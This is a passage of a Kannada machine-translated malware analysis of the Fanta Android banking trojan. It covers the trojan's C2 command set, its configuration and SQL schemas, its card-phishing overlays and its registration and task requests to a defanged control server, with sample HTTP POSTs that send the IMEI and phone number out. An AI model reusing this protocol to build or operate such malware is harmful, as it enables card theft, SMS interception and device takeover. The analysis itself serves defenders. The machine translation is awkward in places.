ಪ್ರವೇಶ ಹಕ್ಕುಗಳನ್ನು ಸ್ವೀಕರಿಸಿದ ತಕ್ಷಣ, ಟ್ರೋಜನ್ ಅಧಿಸೂಚನೆಗಳನ್ನು ಓದಲು ನಿರ್ವಾಹಕರ ಹಕ್ಕುಗಳು ಮತ್ತು ಹಕ್ಕುಗಳನ್ನು ವಿನಂತಿಸುತ್ತದೆ:

ಲೇಸ್ಯಾ, ಫಾಂಟಾ: ಹಳೆಯ ಆಂಡ್ರಾಯ್ಡ್ ಟ್ರೋಜನ್‌ಗಾಗಿ ಹೊಸ ತಂತ್ರ
ಪ್ರವೇಶಿಸುವಿಕೆ ಸೇವೆಯನ್ನು ಬಳಸಿಕೊಂಡು, ಅಪ್ಲಿಕೇಶನ್ ಕೀಸ್ಟ್ರೋಕ್‌ಗಳನ್ನು ಅನುಕರಿಸುತ್ತದೆ, ಇದರಿಂದಾಗಿ ಅಗತ್ಯವಿರುವ ಎಲ್ಲಾ ಹಕ್ಕುಗಳನ್ನು ಸ್ವತಃ ನೀಡುತ್ತದೆ.

ಕಾನ್ಫಿಗರೇಶನ್ ಡೇಟಾವನ್ನು ಸಂಗ್ರಹಿಸಲು ಅಗತ್ಯವಿರುವ ಬಹು ಡೇಟಾಬೇಸ್ ನಿದರ್ಶನಗಳನ್ನು ಫ್ಯಾಂಟಾ ರಚಿಸುತ್ತದೆ (ಇದನ್ನು ನಂತರ ವಿವರಿಸಲಾಗುವುದು), ಹಾಗೆಯೇ ಸೋಂಕಿತ ಸಾಧನದ ಬಗ್ಗೆ ಪ್ರಕ್ರಿಯೆಯಲ್ಲಿ ಸಂಗ್ರಹಿಸಿದ ಮಾಹಿತಿ. ಸಂಗ್ರಹಿಸಿದ ಮಾಹಿತಿಯನ್ನು ಕಳುಹಿಸಲು, ಡೇಟಾಬೇಸ್‌ನಿಂದ ಕ್ಷೇತ್ರಗಳನ್ನು ಡೌನ್‌ಲೋಡ್ ಮಾಡಲು ಮತ್ತು ನಿಯಂತ್ರಣ ಸರ್ವರ್‌ನಿಂದ ಆಜ್ಞೆಯನ್ನು ಸ್ವೀಕರಿಸಲು ವಿನ್ಯಾಸಗೊಳಿಸಲಾದ ಪುನರಾವರ್ತಿತ ಕಾರ್ಯವನ್ನು ಟ್ರೋಜನ್ ರಚಿಸುತ್ತದೆ. CnC ಅನ್ನು ಪ್ರವೇಶಿಸುವ ಮಧ್ಯಂತರವನ್ನು Android ಆವೃತ್ತಿಯನ್ನು ಅವಲಂಬಿಸಿ ಹೊಂದಿಸಲಾಗಿದೆ: 5.1 ರ ಸಂದರ್ಭದಲ್ಲಿ, ಮಧ್ಯಂತರವು 10 ಸೆಕೆಂಡುಗಳು, ಇಲ್ಲದಿದ್ದರೆ 60 ಸೆಕೆಂಡುಗಳು.

ಆಜ್ಞೆಯನ್ನು ಸ್ವೀಕರಿಸಲು, ಫ್ಯಾಂಟಾ ವಿನಂತಿಯನ್ನು ಮಾಡುತ್ತದೆ GetTask ನಿರ್ವಹಣಾ ಸರ್ವರ್‌ಗೆ. ಪ್ರತಿಕ್ರಿಯೆಯಾಗಿ, CnC ಕೆಳಗಿನ ಆಜ್ಞೆಗಳಲ್ಲಿ ಒಂದನ್ನು ಕಳುಹಿಸಬಹುದು:

ತಂಡದ ವಿವರಣೆ
0 SMS ಸಂದೇಶವನ್ನು ಕಳುಹಿಸಿ
1 ಫೋನ್ ಕರೆ ಅಥವಾ USSD ಆಜ್ಞೆಯನ್ನು ಮಾಡಿ
2 ಪ್ಯಾರಾಮೀಟರ್ ಅನ್ನು ನವೀಕರಿಸುತ್ತದೆ ಮಧ್ಯಂತರ
3 ಪ್ಯಾರಾಮೀಟರ್ ಅನ್ನು ನವೀಕರಿಸುತ್ತದೆ ಪ್ರತಿಬಂಧ
6 ಪ್ಯಾರಾಮೀಟರ್ ಅನ್ನು ನವೀಕರಿಸುತ್ತದೆ smsಮ್ಯಾನೇಜರ್
9 SMS ಸಂದೇಶಗಳನ್ನು ಸಂಗ್ರಹಿಸಲು ಪ್ರಾರಂಭಿಸಿ
11 ನಿಮ್ಮ ಫೋನ್ ಅನ್ನು ಫ್ಯಾಕ್ಟರಿ ಸೆಟ್ಟಿಂಗ್‌ಗಳಿಗೆ ಮರುಹೊಂದಿಸಿ
12 ಡೈಲಾಗ್ ಬಾಕ್ಸ್ ರಚನೆಯ ಲಾಗಿಂಗ್ ಅನ್ನು ಸಕ್ರಿಯಗೊಳಿಸಿ/ನಿಷ್ಕ್ರಿಯಗೊಳಿಸಿ

Fanta 70 ಬ್ಯಾಂಕಿಂಗ್ ಅಪ್ಲಿಕೇಶನ್‌ಗಳು, ವೇಗದ ಪಾವತಿ ವ್ಯವಸ್ಥೆಗಳು ಮತ್ತು ಇ-ವ್ಯಾಲೆಟ್‌ಗಳಿಂದ ಅಧಿಸೂಚನೆಗಳನ್ನು ಸಂಗ್ರಹಿಸುತ್ತದೆ ಮತ್ತು ಅವುಗಳನ್ನು ಡೇಟಾಬೇಸ್‌ನಲ್ಲಿ ಸಂಗ್ರಹಿಸುತ್ತದೆ.

ಸಂರಚನಾ ನಿಯತಾಂಕಗಳನ್ನು ಸಂಗ್ರಹಿಸುವುದು

ಕಾನ್ಫಿಗರೇಶನ್ ನಿಯತಾಂಕಗಳನ್ನು ಸಂಗ್ರಹಿಸಲು, ಫ್ಯಾಂಟಾ ಆಂಡ್ರಾಯ್ಡ್ ಪ್ಲಾಟ್‌ಫಾರ್ಮ್‌ಗಾಗಿ ಪ್ರಮಾಣಿತ ವಿಧಾನವನ್ನು ಬಳಸುತ್ತದೆ - ಪ್ರಾಶಸ್ತ್ಯಗಳು-ಕಡತಗಳನ್ನು. ಸೆಟ್ಟಿಂಗ್‌ಗಳನ್ನು ಹೆಸರಿನ ಫೈಲ್‌ಗೆ ಉಳಿಸಲಾಗುತ್ತದೆ ಸೆಟ್ಟಿಂಗ್ಗಳನ್ನು. ಉಳಿಸಿದ ನಿಯತಾಂಕಗಳ ವಿವರಣೆಯು ಕೆಳಗಿನ ಕೋಷ್ಟಕದಲ್ಲಿದೆ.

ಹೆಸರು ಡೀಫಾಲ್ಟ್ ಮೌಲ್ಯ ಸಂಭವನೀಯ ಮೌಲ್ಯಗಳು ವಿವರಣೆ
id 0 ಪೂರ್ಣಾಂಕ ಬಾಟ್ ಐಡಿ
ಸರ್ವರ್ hXXp://onuseseddohap[.]club/ URL ಅನ್ನು ಸರ್ವರ್ ವಿಳಾಸವನ್ನು ನಿಯಂತ್ರಿಸಿ
pwd - ಸ್ಟ್ರಿಂಗ್ ಸರ್ವರ್ ಪಾಸ್ವರ್ಡ್
ಮಧ್ಯಂತರ 20 ಪೂರ್ಣಾಂಕ ಸಮಯದ ಮಧ್ಯಂತರ. ಕೆಳಗಿನ ಕಾರ್ಯಗಳನ್ನು ಎಷ್ಟು ಸಮಯದವರೆಗೆ ಮುಂದೂಡಬೇಕು ಎಂದು ಸೂಚಿಸುತ್ತದೆ:

  • ಕಳುಹಿಸಿದ SMS ಸಂದೇಶದ ಸ್ಥಿತಿಯ ಬಗ್ಗೆ ವಿನಂತಿಯನ್ನು ಕಳುಹಿಸುವಾಗ
  • ನಿರ್ವಹಣಾ ಸರ್ವರ್‌ನಿಂದ ಹೊಸ ಆಜ್ಞೆಯನ್ನು ಸ್ವೀಕರಿಸಲಾಗುತ್ತಿದೆ

ಪ್ರತಿಬಂಧ ಎಲ್ಲಾ ಎಲ್ಲಾ/ಟೆಲ್ ಸಂಖ್ಯೆ ಕ್ಷೇತ್ರವು ಸ್ಟ್ರಿಂಗ್‌ಗೆ ಸಮಾನವಾಗಿದ್ದರೆ ಎಲ್ಲಾ ಅಥವಾ ದೂರವಾಣಿ ಸಂಖ್ಯೆ, ನಂತರ ಸ್ವೀಕರಿಸಿದ SMS ಸಂದೇಶವನ್ನು ಅಪ್ಲಿಕೇಶನ್‌ನಿಂದ ತಡೆಹಿಡಿಯಲಾಗುತ್ತದೆ ಮತ್ತು ಬಳಕೆದಾರರಿಗೆ ತೋರಿಸಲಾಗುವುದಿಲ್ಲ
smsಮ್ಯಾನೇಜರ್ 0 0/1 ಡೀಫಾಲ್ಟ್ SMS ಸ್ವೀಕರಿಸುವವರಂತೆ ಅಪ್ಲಿಕೇಶನ್ ಅನ್ನು ಸಕ್ರಿಯಗೊಳಿಸಿ/ನಿಷ್ಕ್ರಿಯಗೊಳಿಸಿ
ಡೈಲಾಗ್ ಓದಿ ಸುಳ್ಳು ನಿಜ/ಸುಳ್ಳು ಈವೆಂಟ್ ಲಾಗಿಂಗ್ ಅನ್ನು ಸಕ್ರಿಯಗೊಳಿಸಿ/ನಿಷ್ಕ್ರಿಯಗೊಳಿಸಿ ಪ್ರವೇಶಿಸುವಿಕೆ ಈವೆಂಟ್

Fanta ಸಹ ಫೈಲ್ ಅನ್ನು ಬಳಸುತ್ತದೆ smsಮ್ಯಾನೇಜರ್:

ಹೆಸರು ಡೀಫಾಲ್ಟ್ ಮೌಲ್ಯ ಸಂಭವನೀಯ ಮೌಲ್ಯಗಳು ವಿವರಣೆ
pckg - ಸ್ಟ್ರಿಂಗ್ SMS ಸಂದೇಶ ನಿರ್ವಾಹಕರ ಹೆಸರನ್ನು ಬಳಸಲಾಗಿದೆ

ಡೇಟಾಬೇಸ್‌ಗಳೊಂದಿಗೆ ಸಂವಹನ

ಅದರ ಕಾರ್ಯಾಚರಣೆಯ ಸಮಯದಲ್ಲಿ, ಟ್ರೋಜನ್ ಎರಡು ಡೇಟಾಬೇಸ್‌ಗಳನ್ನು ಬಳಸುತ್ತದೆ. ಡೇಟಾಬೇಸ್ ಹೆಸರಿಸಲಾಗಿದೆ a ಫೋನ್‌ನಿಂದ ಸಂಗ್ರಹಿಸಿದ ವಿವಿಧ ಮಾಹಿತಿಯನ್ನು ಸಂಗ್ರಹಿಸಲು ಬಳಸಲಾಗುತ್ತದೆ. ಎರಡನೇ ಡೇಟಾಬೇಸ್ ಹೆಸರಿಸಲಾಗಿದೆ fanta.db ಮತ್ತು ಬ್ಯಾಂಕ್ ಕಾರ್ಡ್‌ಗಳ ಬಗ್ಗೆ ಮಾಹಿತಿಯನ್ನು ಸಂಗ್ರಹಿಸಲು ವಿನ್ಯಾಸಗೊಳಿಸಲಾದ ಫಿಶಿಂಗ್ ವಿಂಡೋಗಳನ್ನು ರಚಿಸುವ ಜವಾಬ್ದಾರಿಯುತ ಸೆಟ್ಟಿಂಗ್‌ಗಳನ್ನು ಉಳಿಸಲು ಬಳಸಲಾಗುತ್ತದೆ.

ಟ್ರೋಜನ್ ಡೇಟಾಬೇಸ್ ಅನ್ನು ಬಳಸುತ್ತದೆ а ಸಂಗ್ರಹಿಸಿದ ಮಾಹಿತಿಯನ್ನು ಸಂಗ್ರಹಿಸಲು ಮತ್ತು ನಿಮ್ಮ ಕ್ರಿಯೆಗಳನ್ನು ಲಾಗ್ ಮಾಡಲು. ಡೇಟಾವನ್ನು ಕೋಷ್ಟಕದಲ್ಲಿ ಸಂಗ್ರಹಿಸಲಾಗಿದೆ ದಾಖಲೆಗಳು. ಟೇಬಲ್ ರಚಿಸಲು, ಕೆಳಗಿನ SQL ಪ್ರಶ್ನೆಯನ್ನು ಬಳಸಿ:

create table logs ( _id integer primary key autoincrement, d TEXT, f TEXT, p TEXT, m integer)

ಡೇಟಾಬೇಸ್ ಈ ಕೆಳಗಿನ ಮಾಹಿತಿಯನ್ನು ಒಳಗೊಂಡಿದೆ:

1. ಸೋಂಕಿತ ಸಾಧನದ ಪ್ರಾರಂಭವನ್ನು ಸಂದೇಶದೊಂದಿಗೆ ಲಾಗ್ ಮಾಡುವುದು ಫೋನ್ ಆನ್ ಆಯಿತು!

2. ಅಪ್ಲಿಕೇಶನ್‌ಗಳಿಂದ ಅಧಿಸೂಚನೆಗಳು. ಕೆಳಗಿನ ಟೆಂಪ್ಲೇಟ್ ಪ್ರಕಾರ ಸಂದೇಶವನ್ನು ರಚಿಸಲಾಗಿದೆ:

(<%App Name%>)<%Title%>: <%Notification text%>

3. ಟ್ರೋಜನ್ ರಚಿಸಿದ ಫಿಶಿಂಗ್ ಫಾರ್ಮ್‌ಗಳಿಂದ ಬ್ಯಾಂಕ್ ಕಾರ್ಡ್ ಡೇಟಾ. ಪ್ಯಾರಾಮೀಟರ್ VIEW_NAME ಕೆಳಗಿನವುಗಳಲ್ಲಿ ಒಂದಾಗಿರಬಹುದು:

  • ಅಲಿಎಕ್ಸ್ಪ್ರೆಸ್
  • Avito
  • ಗೂಗಲ್ ಆಟ
  • ಇತರೆ <%ಅಪ್ಲಿಕೇಶನ್ ಹೆಸರು%>

ಸಂದೇಶವನ್ನು ಸ್ವರೂಪದಲ್ಲಿ ಲಾಗ್ ಮಾಡಲಾಗಿದೆ:

[<%Time in format HH:mm:ss dd.MM.yyyy%>](<%VIEW_NAME%>) Номер карты:<%CARD_NUMBER%>; Дата:<%MONTH%>/<%YEAR%>; CVV: <%CVV%>

4. ಸ್ವರೂಪದಲ್ಲಿ ಒಳಬರುವ/ಹೊರಹೋಗುವ SMS ಸಂದೇಶಗಳು:

([<%Time in format HH:mm:ss dd.MM.yyyy%>] Тип: Входящее/Исходящее) <%Mobile number%>:<%SMS-text%>

5. ಸ್ವರೂಪದಲ್ಲಿ ಸಂವಾದ ಪೆಟ್ಟಿಗೆಯನ್ನು ರಚಿಸುವ ಪ್ಯಾಕೇಜ್ ಕುರಿತು ಮಾಹಿತಿ:

(<%Package name%>)<%Package information%>

ಉದಾಹರಣೆ ಕೋಷ್ಟಕ ದಾಖಲೆಗಳು:

ಲೇಸ್ಯಾ, ಫಾಂಟಾ: ಹಳೆಯ ಆಂಡ್ರಾಯ್ಡ್ ಟ್ರೋಜನ್‌ಗಾಗಿ ಹೊಸ ತಂತ್ರ
ಫ್ಯಾಂಟಾದ ಕಾರ್ಯಚಟುವಟಿಕೆಗಳಲ್ಲಿ ಒಂದು ಬ್ಯಾಂಕ್ ಕಾರ್ಡ್‌ಗಳ ಬಗ್ಗೆ ಮಾಹಿತಿಯ ಸಂಗ್ರಹವಾಗಿದೆ. ಬ್ಯಾಂಕಿಂಗ್ ಅಪ್ಲಿಕೇಶನ್‌ಗಳನ್ನು ತೆರೆಯುವಾಗ ಫಿಶಿಂಗ್ ವಿಂಡೋಗಳ ರಚನೆಯ ಮೂಲಕ ಡೇಟಾ ಸಂಗ್ರಹಣೆ ಸಂಭವಿಸುತ್ತದೆ. ಟ್ರೋಜನ್ ಒಮ್ಮೆ ಮಾತ್ರ ಫಿಶಿಂಗ್ ವಿಂಡೋವನ್ನು ರಚಿಸುತ್ತದೆ. ವಿಂಡೋವನ್ನು ಬಳಕೆದಾರರಿಗೆ ತೋರಿಸಿದ ಮಾಹಿತಿಯನ್ನು ಟೇಬಲ್‌ನಲ್ಲಿ ಸಂಗ್ರಹಿಸಲಾಗಿದೆ ಸೆಟ್ಟಿಂಗ್ಗಳನ್ನು ಡೇಟಾಬೇಸ್‌ನಲ್ಲಿ fanta.db. ಡೇಟಾಬೇಸ್ ರಚಿಸಲು, ಈ ಕೆಳಗಿನ SQL ಪ್ರಶ್ನೆಯನ್ನು ಬಳಸಿ:

create table settings (can_login integer, first_bank integer, can_alpha integer, can_avito integer, can_ali integer, can_vtb24 integer, can_telecard integer, can_another integer, can_card integer);

ಎಲ್ಲಾ ಟೇಬಲ್ ಕ್ಷೇತ್ರಗಳು ಸೆಟ್ಟಿಂಗ್ಗಳನ್ನು ಪೂರ್ವನಿಯೋಜಿತವಾಗಿ 1 ಗೆ ಪ್ರಾರಂಭಿಸಲಾಗಿದೆ (ಫಿಶಿಂಗ್ ವಿಂಡೋವನ್ನು ರಚಿಸಿ). ಬಳಕೆದಾರರು ತಮ್ಮ ಡೇಟಾವನ್ನು ನಮೂದಿಸಿದ ನಂತರ, ಮೌಲ್ಯವನ್ನು 0 ಗೆ ಹೊಂದಿಸಲಾಗುತ್ತದೆ. ಟೇಬಲ್ ಕ್ಷೇತ್ರಗಳ ಉದಾಹರಣೆ ಸೆಟ್ಟಿಂಗ್ಗಳನ್ನು:

  • ಮಾಡಬಹುದು_ಲಾಗಿನ್ - ಬ್ಯಾಂಕಿಂಗ್ ಅಪ್ಲಿಕೇಶನ್ ತೆರೆಯುವಾಗ ಫಾರ್ಮ್ ಅನ್ನು ಪ್ರದರ್ಶಿಸಲು ಕ್ಷೇತ್ರವು ಜವಾಬ್ದಾರವಾಗಿರುತ್ತದೆ
  • ಮೊದಲ_ಬ್ಯಾಂಕ್ - ಬಳಸಲಾಗುವುದಿಲ್ಲ
  • ಕ್ಯಾನ್_ಅವಿಟೊ - Avito ಅಪ್ಲಿಕೇಶನ್ ಅನ್ನು ತೆರೆಯುವಾಗ ಫಾರ್ಮ್ ಅನ್ನು ಪ್ರದರ್ಶಿಸಲು ಕ್ಷೇತ್ರವು ಕಾರಣವಾಗಿದೆ
  • ಕ್ಯಾನ್_ಅಲಿ - Aliexpress ಅಪ್ಲಿಕೇಶನ್ ಅನ್ನು ತೆರೆಯುವಾಗ ಫಾರ್ಮ್ ಅನ್ನು ಪ್ರದರ್ಶಿಸಲು ಕ್ಷೇತ್ರವು ಕಾರಣವಾಗಿದೆ
  • ಮಾಡಬಹುದು_ಇನ್ನೊಂದು - ಪಟ್ಟಿಯಿಂದ ಯಾವುದೇ ಅಪ್ಲಿಕೇಶನ್ ಅನ್ನು ತೆರೆಯುವಾಗ ಫಾರ್ಮ್ ಅನ್ನು ಪ್ರದರ್ಶಿಸಲು ಕ್ಷೇತ್ರವು ಕಾರಣವಾಗಿದೆ: ಯುಲಾ, ಪಾಂಡೋ, ಡ್ರೋಮ್ ಆಟೋ, ವಾಲೆಟ್. ರಿಯಾಯಿತಿ ಮತ್ತು ಬೋನಸ್ ಕಾರ್ಡ್‌ಗಳು, Aviasales, ಬುಕಿಂಗ್, Trivago
  • ಕ್ಯಾನ್_ಕಾರ್ಡ್ - ತೆರೆಯುವಾಗ ಫಾರ್ಮ್ ಅನ್ನು ಪ್ರದರ್ಶಿಸಲು ಕ್ಷೇತ್ರವು ಕಾರಣವಾಗಿದೆ ಗೂಗಲ್ ಆಟ

ನಿರ್ವಹಣಾ ಸರ್ವರ್‌ನೊಂದಿಗೆ ಸಂವಹನ

ಮ್ಯಾನೇಜ್‌ಮೆಂಟ್ ಸರ್ವರ್‌ನೊಂದಿಗೆ ನೆಟ್‌ವರ್ಕ್ ಸಂವಹನವು HTTP ಪ್ರೋಟೋಕಾಲ್ ಮೂಲಕ ಸಂಭವಿಸುತ್ತದೆ. ನೆಟ್‌ವರ್ಕ್‌ನೊಂದಿಗೆ ಕೆಲಸ ಮಾಡಲು, ಫಾಂಟಾ ಜನಪ್ರಿಯ ರೆಟ್ರೋಫಿಟ್ ಲೈಬ್ರರಿಯನ್ನು ಬಳಸುತ್ತದೆ. ವಿನಂತಿಗಳನ್ನು ಇವರಿಗೆ ಕಳುಹಿಸಲಾಗಿದೆ: hXXp://onuseseddohap[.]club/controller.php. ಸರ್ವರ್‌ನಲ್ಲಿ ನೋಂದಾಯಿಸುವಾಗ ಸರ್ವರ್ ವಿಳಾಸವನ್ನು ಬದಲಾಯಿಸಬಹುದು. ಸರ್ವರ್‌ನಿಂದ ಪ್ರತಿಕ್ರಿಯೆಯಾಗಿ ಕುಕೀಗಳನ್ನು ಕಳುಹಿಸಬಹುದು. ಫಾಂಟಾ ಸರ್ವರ್‌ಗೆ ಈ ಕೆಳಗಿನ ವಿನಂತಿಗಳನ್ನು ಮಾಡುತ್ತದೆ:

  • ನಿಯಂತ್ರಣ ಸರ್ವರ್‌ನಲ್ಲಿ ಬೋಟ್‌ನ ನೋಂದಣಿ ಒಮ್ಮೆ ಸಂಭವಿಸುತ್ತದೆ, ಮೊದಲ ಉಡಾವಣೆಯಲ್ಲಿ. ಸೋಂಕಿತ ಸಾಧನದ ಕುರಿತು ಕೆಳಗಿನ ಡೇಟಾವನ್ನು ಸರ್ವರ್‌ಗೆ ಕಳುಹಿಸಲಾಗುತ್ತದೆ:
    · ಕುಕಿ - ಸರ್ವರ್‌ನಿಂದ ಪಡೆದ ಕುಕೀಗಳು (ಡೀಫಾಲ್ಟ್ ಮೌಲ್ಯವು ಖಾಲಿ ಸ್ಟ್ರಿಂಗ್ ಆಗಿದೆ)
    · ಕ್ರಮದಲ್ಲಿ - ಸ್ಟ್ರಿಂಗ್ ಸ್ಥಿರ ನೋಂದಣಿ_ಬೋಟ್
    · ಪೂರ್ವಪ್ರತ್ಯಯ - ಪೂರ್ಣಾಂಕ ಸ್ಥಿರ 2
    · ಆವೃತ್ತಿ_sdk - ಕೆಳಗಿನ ಟೆಂಪ್ಲೇಟ್ ಪ್ರಕಾರ ರಚನೆಯಾಗುತ್ತದೆ: <%Build.MODEL%>/<%Build.VERSION.RELEASE%>(Avit)
    · IMEI - ಸೋಂಕಿತ ಸಾಧನದ IMEI
    · ದೇಶದ - ISO ಸ್ವರೂಪದಲ್ಲಿ ಆಪರೇಟರ್ ನೋಂದಾಯಿಸಿದ ದೇಶದ ಕೋಡ್
    · ಸಂಖ್ಯೆ - ದೂರವಾಣಿ ಸಂಖ್ಯೆ
    · ಆಯೋಜಕರು - ಆಪರೇಟರ್ ಹೆಸರು

    ಸರ್ವರ್‌ಗೆ ಕಳುಹಿಸಲಾದ ವಿನಂತಿಯ ಉದಾಹರಣೆ:

    POST /controller.php HTTP/1.1
    Cookie:
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 144
    Host: onuseseddohap.club
    Connection: close
    Accept-Encoding: gzip, deflate
    User-Agent: okhttp/3.6.0
    
    mode=register_bot&prefix=2&version_sdk=<%VERSION_SDK%>&imei=<%IMEI%>&country=<%COUNTRY_ISO%>&number=<%TEL_NUMBER%>&operator=<%OPERATOR_NAME%>
    

    ವಿನಂತಿಗೆ ಪ್ರತಿಕ್ರಿಯೆಯಾಗಿ, ಸರ್ವರ್ ಈ ಕೆಳಗಿನ ನಿಯತಾಂಕಗಳನ್ನು ಹೊಂದಿರುವ JSON ವಸ್ತುವನ್ನು ಹಿಂತಿರುಗಿಸಬೇಕು:
    · bot_id - ಸೋಂಕಿತ ಸಾಧನದ ID. bot_id 0 ಗೆ ಸಮನಾಗಿದ್ದರೆ, Fanta ವಿನಂತಿಯನ್ನು ಮರು-ಕಾರ್ಯಗತಗೊಳಿಸುತ್ತದೆ.
    bot_pwd - ಸರ್ವರ್‌ಗಾಗಿ ಪಾಸ್‌ವರ್ಡ್.
    ಸರ್ವರ್ - ನಿಯಂತ್ರಣ ಸರ್ವರ್ ವಿಳಾಸ. ಐಚ್ಛಿಕ ಪ್ಯಾರಾಮೀಟರ್. ನಿಯತಾಂಕವನ್ನು ನಿರ್ದಿಷ್ಟಪಡಿಸದಿದ್ದರೆ, ಅಪ್ಲಿಕೇಶನ್‌ನಲ್ಲಿ ಉಳಿಸಿದ ವಿಳಾಸವನ್ನು ಬಳಸಲಾಗುತ್ತದೆ.

    ಉದಾಹರಣೆ JSON ವಸ್ತು:

    {
        "response":[
       	 {
       		 "bot_id": <%BOT_ID%>,
       		 "bot_pwd": <%BOT_PWD%>,
       		 "server": <%SERVER%>
       	 }
        ],
        "status":"ok"
    }

  • ಸರ್ವರ್‌ನಿಂದ ಆಜ್ಞೆಯನ್ನು ಸ್ವೀಕರಿಸಲು ವಿನಂತಿ. ಕೆಳಗಿನ ಡೇಟಾವನ್ನು ಸರ್ವರ್‌ಗೆ ಕಳುಹಿಸಲಾಗಿದೆ:
    · ಕುಕಿ - ಸರ್ವರ್‌ನಿಂದ ಪಡೆದ ಕುಕೀಗಳು
    · ಬಿಡ್ - ವಿನಂತಿಯನ್ನು ಕಳುಹಿಸುವಾಗ ಸ್ವೀಕರಿಸಿದ ಸೋಂಕಿತ ಸಾಧನದ ಐಡಿ ನೋಂದಣಿ_ಬೋಟ್
    · pwd - ಸರ್ವರ್‌ಗಾಗಿ ಪಾಸ್‌ವರ್ಡ್
    · divice_admin - ನಿರ್ವಾಹಕರ ಹಕ್ಕುಗಳನ್ನು ಪಡೆಯಲಾಗಿದೆಯೇ ಎಂದು ಕ್ಷೇತ್ರವು ನಿರ್ಧರಿಸುತ್ತದೆ. ನಿರ್ವಾಹಕರ ಹಕ್ಕುಗಳನ್ನು ಪಡೆದಿದ್ದರೆ, ಕ್ಷೇತ್ರವು ಸಮಾನವಾಗಿರುತ್ತದೆ 1, ಇಲ್ಲದಿದ್ದರೆ 0
    · ಪ್ರವೇಶಿಸುವಿಕೆ - ಪ್ರವೇಶಿಸುವಿಕೆ ಸೇವೆಯ ಕಾರ್ಯಾಚರಣೆಯ ಸ್ಥಿತಿ. ಸೇವೆಯನ್ನು ಪ್ರಾರಂಭಿಸಿದರೆ, ಮೌಲ್ಯವು 1, ಇಲ್ಲದಿದ್ದರೆ 0
    · SMS ಮ್ಯಾನೇಜರ್ - SMS ಸ್ವೀಕರಿಸಲು ಟ್ರೋಜನ್ ಅನ್ನು ಡೀಫಾಲ್ಟ್ ಅಪ್ಲಿಕೇಶನ್ ಆಗಿ ಸಕ್ರಿಯಗೊಳಿಸಲಾಗಿದೆಯೇ ಎಂಬುದನ್ನು ತೋರಿಸುತ್ತದೆ
    · ಪರದೆಯ - ಪರದೆಯು ಯಾವ ಸ್ಥಿತಿಯಲ್ಲಿದೆ ಎಂಬುದನ್ನು ತೋರಿಸುತ್ತದೆ. ಮೌಲ್ಯವನ್ನು ಹೊಂದಿಸಲಾಗುವುದು 1, ಪರದೆಯು ಆನ್ ಆಗಿದ್ದರೆ, ಇಲ್ಲದಿದ್ದರೆ 0;

    ಸರ್ವರ್‌ಗೆ ಕಳುಹಿಸಲಾದ ವಿನಂತಿಯ ಉದಾಹರಣೆ:

    POST /controller.php HTTP/1.1
    Cookie:
    Content-Type: application/x-www-form-urlencoded
    Host: onuseseddohap.club
    Connection: close
    Accept-Encoding: gzip, deflate
    User-Agent: okhttp/3.6.0
    
    mode=getTask&bid=<%BID%>&pwd=<%PWD%>&divice_admin=<%DEV_ADM%>&Accessibility=<%ACCSBL%>&SMSManager=<%SMSMNG%>&screen=<%SCRN%>

    ಆಜ್ಞೆಯನ್ನು ಅವಲಂಬಿಸಿ, ಸರ್ವರ್ ವಿವಿಧ ನಿಯತಾಂಕಗಳೊಂದಿಗೆ JSON ವಸ್ತುವನ್ನು ಹಿಂತಿರುಗಿಸಬಹುದು:

    · ತಂಡದ SMS ಸಂದೇಶವನ್ನು ಕಳುಹಿಸಿ: ಪ್ಯಾರಾಮೀಟರ್‌ಗಳು ಫೋನ್ ಸಂಖ್ಯೆ, SMS ಸಂದೇಶದ ಪಠ್ಯ ಮತ್ತು ಕಳುಹಿಸಲಾದ ಸಂದೇಶದ ID ಅನ್ನು ಒಳಗೊಂಡಿರುತ್ತವೆ. ಪ್ರಕಾರದೊಂದಿಗೆ ಸರ್ವರ್‌ಗೆ ಸಂದೇಶವನ್ನು ಕಳುಹಿಸುವಾಗ ಗುರುತಿಸುವಿಕೆಯನ್ನು ಬಳಸಲಾಗುತ್ತದೆ setSmsStatus.

    {
        "response":
        [
       	 {
       		 "mode": 0,
       		 "sms_number": <%SMS_NUMBER%>,
       		 "sms_text": <%SMS_TEXT%>,
       		 "sms_id": %SMS_ID%
       	 }
        ],
        "status":"ok"
    }

    · ತಂಡದ ಫೋನ್ ಕರೆ ಅಥವಾ USSD ಆಜ್ಞೆಯನ್ನು ಮಾಡಿ: ಫೋನ್ ಸಂಖ್ಯೆ ಅಥವಾ ಆಜ್ಞೆಯು ಪ್ರತಿಕ್ರಿಯೆಯ ದೇಹದಲ್ಲಿ ಬರುತ್ತದೆ.

    {
        "response":
        [
       	 {
       		 "mode": 1,
       		 "command": <%TEL_NUMBER%>
       	 }
        ],
        "status":"ok"
    }

    · ತಂಡದ ಮಧ್ಯಂತರ ನಿಯತಾಂಕವನ್ನು ಬದಲಾಯಿಸಿ.

    {
        "response":
        [
       	 {
       		 "mode": 2,
       		 "interval": <%SECONDS%>
       	 }
        ],
        "status":"ok"
    }

    · ತಂಡದ ಇಂಟರ್ಸೆಪ್ಟ್ ಪ್ಯಾರಾಮೀಟರ್ ಬದಲಾಯಿಸಿ.

    {
        "response":
        [
       	 {
       		 "mode": 3,
       		 "intercept": "all"/"telNumber"/<%ANY_STRING%>
       	 }
        ],
        "status":"ok"
    }

    · ತಂಡದ SmsManager ಕ್ಷೇತ್ರವನ್ನು ಬದಲಾಯಿಸಿ.

    {
        "response":
        [
       	 {
       		 "mode": 6,
       		 "enable": 0/1
       	 }
        ],
        "status":"ok"
    }

    · ತಂಡದ ಸೋಂಕಿತ ಸಾಧನದಿಂದ SMS ಸಂದೇಶಗಳನ್ನು ಸಂಗ್ರಹಿಸಿ.

    {
        "response":
        [
       	 {
       		 "mode": 9
       	 }
        ],
        "status":"ok"
    }

    · ತಂಡದ ನಿಮ್ಮ ಫೋನ್ ಅನ್ನು ಫ್ಯಾಕ್ಟರಿ ಸೆಟ್ಟಿಂಗ್‌ಗಳಿಗೆ ಮರುಹೊಂದಿಸಿ:

    {
        "response":
        [
       	 {
       		 "mode": 11
       	 }
        ],
        "status":"ok"
    }

    · ತಂಡದ ReadDialog ನಿಯತಾಂಕವನ್ನು ಬದಲಾಯಿಸಿ.

    {
        "response":
        [
       	 {
       		 "mode": 12,
       		 "enable": 0/1
       	 }
        ],
        "status":"ok"
    }

